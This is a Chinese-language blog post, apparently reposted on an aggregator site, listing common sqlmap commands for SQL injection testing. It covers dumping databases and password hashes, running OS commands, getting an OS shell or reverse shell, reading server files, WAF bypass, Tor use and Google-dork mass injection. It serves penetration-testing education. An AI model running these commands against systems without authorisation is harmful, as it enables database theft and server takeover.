【SQLmap】常用命令

文章目录

  • 实际使用案例
  • 常用命令
    • 基本命令
    • 数据库指纹识别
    • 用户信息
    • 用户权限
    • 数据库枚举
    • 数据导出
    • 密码哈希
    • 操作系统命令执行
    • 文件操作
    • 代理和网络
    • 参数指定
    • 保存恢复
    • 自动搜索注入
    • 智能模式
    • 等级设置
    • 自动注入
    • WAF 绕过
    • 杂项
    • 帮助和支持

SQLmap 是一款开源的自动化 SQL 注入检测和利用工具,广泛用于网络安全的渗透测试中。它支持广泛的数据库服务器,能够自动化地检测和利用大多数的 SQL 注入漏洞,以及对数据库服务器进行不同程度的访问和控制。

在这里插入图片描述

实际使用案例

假设你已经确定一个 URL 存在 SQL 注入漏洞,你可以使用以下命令来进一步探测和利用它:

sqlmap -u "http://example.com/index.php?id=1" --dbs

这个命令会列出所有数据库。

接下来,如果你想获取特定数据库中的所有表名:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

若要导出某个表的数据:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

常用命令

以下是 SQLmap 的一些重要命令和功能:

基本命令

  • sqlmap -u "TARGET_URL":对指定的 URL 进行注入测试。

数据库指纹识别

  • --banner:获取数据库的详细信息。
  • --dbms "Mysql":指定数据库类型。

用户信息

  • --users:列出数据库中的所有用户。
  • --current-user:确定当前连接的数据库用户。
  • --is-dba:检查当前用户是否具有数据库管理员权限。

用户权限

  • --privileges:列出数据库用户的权限。
  • --privileges -U root:查看指定用户权限。

数据库枚举

  • --dbs:列出所有数据库。
  • -D DATABASE_NAME --tables:列出指定数据库的所有表。
  • -D DATABASE_NAME -T TABLE_NAME --columns:列出指定表的所有列。
  • --start 1 --stop 20:列出 20 条。

数据导出

  • -D DATABASE_NAME -T TABLE_NAME -C COLUMN_NAME --dump:导出指定数据库、表或列的数据。

密码哈希

  • --passwords:尝试获取数据库用户的密码哈希。

操作系统命令执行

  • --os-cmd="COMMAND":在支持的数据库上执行操作系统命令。
  • --os-shell:提供一个交互式的 shell 环境。
  • --udf-inject:导入用户自定义函数(获取系统权限)。
  • --os-pwn :反弹 shell。

文件操作

  • --file-read=FILE_PATH:从数据库服务器读取文件。
  • --file-write=FILE_PATH --file-dest=DEST_PATH:将文件写入数据库服务器。
  • --reg-read :读取 win 系统注册表

代理和网络

  • --proxy=PROXY:通过指定的代理服务器进行 SQLmap 的所有请求。
  • --tor:使用 Tor 匿名网络。
  • --delay=DELAY_SECONDS:设置请求之间的延迟时间。
  • --timeout=TIMEOUT_SECONDS:设置请求的超时时间。

参数指定

  • --string"STRING_ON_TRUE_PAGE":指定关键词。
  • --data "id=3" :设置post参数。
  • --cookie "COOKIE_VALUE" :设置cookie。
  • --random-agent:使用随机 User-Agent 头发送请求。
  • --sql-shell :执行指定 sql 命令

保存恢复

  • --dbs-o "sqlmap.log":保存进度。
  • --dbs -o "sqlmap.log" --resume":恢复进度。

自动搜索注入

  • sqlmap -g "google 语法" --dump-all --batch:搜索注入点自动 跑出所有字段。

智能模式

  • --smart:启用智能模式,使用更少的查询来确定数据库的类型,以及数据库中表和字段的名称。

等级设置

  • --level:这个选项用来定义测试的级别。

自动注入

  • --batch:无需交互,自动执行。

WAF 绕过

  • --tamper=TAMPER_SCRIPTS:使用篡改脚本来尝试绕过 WAF。

杂项

  • --beep:发现 SQL 注入时发出蜂鸣声。
  • --check-payload:检查 IDS 对注入有效负载的检测。
  • --forms:解析和测试目标 URL 的表单。

帮助和支持

  • sqlmap -hsqlmap --help:显示帮助信息。
  • sqlmap -v:显示程序的版本号。

想要成为无论多么悲伤的时候,也能够漂亮微笑的人吧。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/760529.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Web Based Quiz System v1.0 SQL 注入漏洞(CVE-2022-32991)

Web Based Quiz System v1.0 SQL 注入漏洞(CVE-2022-32991)

前言 CVE-2022-32991 是一个影响 Web Based Quiz System v1.0 的 SQL 注入漏洞。这个漏洞存在于 welcome.php 文件中的 eid 参数处。攻击者可以通过此漏洞在数据库中执行任意 SQL 语句,从而获取、修改或删除数据库中的数据。 具体细节如下: 攻击向量&…
阅读更多...
【Spring Boot】Java 持久层 API:JPA

【Spring Boot】Java 持久层 API:JPA

Java 持久层 API:JPA 1.Spring Data1.1 主要模块1.2 社区模块 2.JPA3.使用 JPA3.1 添加 JPA 和 MySQL 数据库的依赖3.2 配置数据库连接信息 4.了解 JPA 注解和属性4.1 常用注解4.2 映射关系的注解4.3 映射关系的属性 5.用 JPA 构建实体数据表 1.Spring Data Spring…
阅读更多...
VMware虚拟机迁移:兼用性踩坑和复盘

VMware虚拟机迁移:兼用性踩坑和复盘

文章目录 方法失败情况分析:参考文档 方法 虚拟机关机,整个文件夹压缩后拷贝到新机器中,开机启用即可 成功的情况: Mac (intel i5) -> Mac (intel i7)Mac (intel, MacOS - VMware Fusion) -> DELL (intel, Windows - VMw…
阅读更多...
flask的基本使用2

flask的基本使用2

上一篇我们介绍了基本使用方法 flask使用 【 1 】基本使用 from flask import Flask# 1 实例化得到对象 app Flask(__name__)# 2 注册路由--》写视图函数 app.route(/) def index():# 3 返回给前端字符串return hello worldif __name__ __main__:# 运行app,默认…
阅读更多...
Linux【环境 CenOS7】部分软件安装链接整理

Linux【环境 CenOS7】部分软件安装链接整理

优质博文:IT-BLOG-CN 一、开启网络 【问题】: 刚安装完CentOS,当ping www.baidu.com时,ping不通; 【解决】: 进入cd /etc/sysconfig/network-scripts/我这里修改的是ifcfg-ens33文件,将ONBOOT…
阅读更多...
论文阅读_基于嵌入的Facebook搜索

论文阅读_基于嵌入的Facebook搜索

英文名称:Embedding-based Retrieval in Facebook Search 中文名称:基于嵌入式检索的Facebook搜索 时间:Wed, 29 Jul 2020 (v2) 地址:https://arxiv.org/abs/2006.11632 作者:Jui-Ting Huang, Ashish Sharma, Shuying …
阅读更多...
【计算机网络仿真】b站湖科大教书匠思科Packet Tracer——实验12 默认路由和特定主机路由

【计算机网络仿真】b站湖科大教书匠思科Packet Tracer——实验12 默认路由和特定主机路由

一、实验目的 1.验证默认路由和特定主机路由的作用; 二、实验要求 1.使用Cisco Packet Tracer仿真平台; 2.观看B站湖科大教书匠仿真实验视频,完成对应实验。 三、实验内容 1.构建网络拓扑; 2.验证验证默认路由和特定主机路由…
阅读更多...
MySQL高级-索引-使用规则-SQL提示(use、ignore、force)

MySQL高级-索引-使用规则-SQL提示(use、ignore、force)

文章目录 1、查看表 tb_user2、展示索引3、为profession、age、status创建 联合索引4、查询 profession软件工程5、执行计划 profession软件工程6、创建profession单列索引7、再次执行计划 profession软件工程8、SQL提示8.1、use index(idx_user_pro)8.2、ignore index(idx_use…
阅读更多...
九浅一深Jemalloc5.3.0 -- ①浅*编译调试

九浅一深Jemalloc5.3.0 -- ①浅*编译调试

目前市面上有不少分析Jemalloc老版本的博文,但5.3.0却少之又少。而且5.3.0的架构与之前的版本也有较大不同,本着“与时俱进”、“由浅入深”的宗旨,我将逐步分析Jemalloc5.3.0的实现。5.3.0的特性请见Releases jemalloc/jemalloc GitHub 另…
阅读更多...
dB分贝入门

dB分贝入门

主要参考资料: dB(分贝)定义及其应用: https://blog.csdn.net/u014162133/article/details/110388145 目录 dB的应用一、声音的大小二、信号强度三、增益 dB的应用 一、声音的大小 在日常生活中,住宅小区告知牌上面标示噪音要低…
阅读更多...
实战精选 | 在NPU上运行BGE embedding模型,提升RAG整体性能

实战精选 | 在NPU上运行BGE embedding模型,提升RAG整体性能

点击蓝字 关注我们,让开发变得更有趣 作者 | 杨亦诚 排版 | 李擎 介绍 BGE全称是BAAI General Embedding,即北京智源人工智能研究院通用Embedding模型,它可以将任意文本映射到低维的稠密向量,在文本向量化任务中得到了广泛的应用。可以看到在…
阅读更多...
180Kg大载重多旋翼无人机技术详解

180Kg大载重多旋翼无人机技术详解

一、机体结构与材料 180Kg大载重多旋翼无人机在机体结构上采用了高强度轻量化设计。其主体框架采用航空铝合金材料,既保证了机体的结构强度,又减轻了整体重量。同时,关键部位如连接件、旋翼支撑臂等则采用碳纤维复合材料,以进一步…
阅读更多...
独一无二的设计模式——单例模式(Java实现)

独一无二的设计模式——单例模式(Java实现)

1. 引言 亲爱的读者们,欢迎来到我们的设计模式专题,今天的讲解的设计模式,还是单例模式哦!上次讲解的单例模式是基于Python实现(独一无二的设计模式——单例模式(python实现))的&am…
阅读更多...
Django 对模型创建的两表插入数据

Django 对模型创建的两表插入数据

1,添加模型 Test/app8/models.py from django.db import modelsclass User(models.Model):username models.CharField(max_length50, uniqueTrue)email models.EmailField(uniqueTrue)password models.CharField(max_length128) # 使用哈希存储密码first_name …
阅读更多...
无人机挂载抛弹吊舱技术详解

无人机挂载抛弹吊舱技术详解

随着无人机技术的飞速发展,无人机在军事、安全、农业、环保等领域的应用越来越广泛。其中,挂载抛弹吊舱的无人机在精确打击、应急处置等场合发挥着重要作用。抛弹吊舱技术通过将弹药、物资等有效载荷挂载在无人机下方,实现了无人机的远程投放…
阅读更多...
Linux源码阅读笔记07-进程管理4大常用API函数

Linux源码阅读笔记07-进程管理4大常用API函数

find_get_pid find_get_pid(...)函数功能:根据进程编号获取对应的进程描述符,具体Linux内核源码对应函数设计如下: 获取进程描述符,且描述符的count1,表示进程多一个用户 pid_task pid_task(...)函数功能&#xff1…
阅读更多...
《昇思25天学习打卡营第6天 | 函数式自动微分》

《昇思25天学习打卡营第6天 | 函数式自动微分》

《昇思25天学习打卡营第6天 | 函数式自动微分》 目录 《昇思25天学习打卡营第6天 | 函数式自动微分》函数式自动微分简单的单层线性变换模型函数与计算图微分函数与梯度计算Stop Gradient 函数式自动微分 神经网络的训练主要使用反向传播算法,模型预测值&#xff0…
阅读更多...
基于ssm口红商城管理的设计与实现

基于ssm口红商城管理的设计与实现

一、👨‍🎓网站题目 口红商城项目可以提供更加便捷和高效的购物方式。消费者可以在家中使用电脑或手机随时随地购物,避免了传统购物方式中需要花费时间和精力去实体店铺购物的麻烦。此外,口红商城项目还提供了更多的选择和更低的…
阅读更多...
JavaSE (Java基础):面向对象(上)

JavaSE (Java基础):面向对象(上)

8 面向对象 面向对象编程的本质就是:以类的方法组织代码,以对象的组织(封装)数据。 8.1 方法的回顾 package com.oop.demo01;// Demo01 类 public class Demo01 {// main方法public static void main(String[] args) {int c 10…
阅读更多...
2023年的Facebook营销:超级完整指南

2023年的Facebook营销:超级完整指南

Facebook营销不是可选的,是必须的。Facebook是世界上使用最多的社交平台,每天吸引22.9亿活跃用户。 它也不全是度假照片和虚张声势。对于53.2% 的 16-24 岁互联网用户,社交媒体是他们进行品牌研究的主要来源。而且,66% 的 Facebo…
阅读更多...
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站